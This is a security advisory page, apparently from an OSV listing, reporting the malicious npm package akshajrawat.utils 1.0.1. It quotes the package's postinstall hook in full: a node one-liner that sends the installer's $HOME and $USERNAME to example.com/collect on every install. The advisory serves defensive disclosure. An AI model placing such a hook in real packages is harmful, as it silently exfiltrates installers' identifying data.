akshajrawat.utils @1.0.1
Vulnerability report · Last retrieved from osv.dev July 15, 2026 at 3:50 AM UTC
OSV ID
MAL-2026-10558
Ecosystem
npm
Summary
The package's package.json declares a postinstall lifecycle hook that runs automatically on npm install : node -e "require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)" . On every install, this issues an unconditional HTTPS GET to https://example.com/collect with the installer's $HOME path and $USERNAME embedded as query-string parameters. This is the canonical supply-chain exfiltration shape: lifecycle-triggered, unconditional, undocumented outbound transmission of installer-side identifiers. While example.com and the package description suggest the package may be a proof-of-concept or research artifact, the structural behavior would harm any installer who runs npm install against it, and the same scaffold trivially redirects to an attacker-controlled host.
Source: amazon-inspector (105157af41712b64f8b36ec1cb01e28958e4ad828a0c08d0979a1f6e22d1f13d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.